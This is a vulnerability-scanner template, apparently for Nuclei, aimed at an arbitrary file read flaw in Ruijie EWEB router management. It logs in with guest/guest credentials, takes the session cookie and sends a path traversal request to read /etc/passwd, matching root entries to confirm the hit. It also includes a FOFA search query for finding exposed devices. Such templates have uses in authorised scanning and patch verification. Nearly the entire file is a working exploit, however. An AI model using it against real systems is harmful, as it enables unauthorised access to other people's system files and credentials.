http:
    - extractors:
        - group: 1
          internal: true
          name: RUIJIEID
          part: header
          regex:
            - RUIJIEID=(.*?);
          type: regex
      raw:
        - |
          POST /ddi/server/login.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: application/x-www-form-urlencoded

          username=guest&password=guest?
    - matchers:
        - part: body
          regex:
            - root:.*:0:0
          type: regex
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /check.php?a=index&url=../../../../../etc/passwd HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Cookie: {{RUIJIEID}}
id: ruijieEWEB-check_php-File-reading
info:
    author: Superhero
    description: |-
        fofa: title="锐捷网络-EWEB网管系统"
        锐捷EWEB路由器 check.php 任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 锐捷EWEB路由器 check.php 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/1GaVAZLcHXVRLUPCdPnBVw
    severity: high
    tags:
        - File reading
        - 锐捷eweb
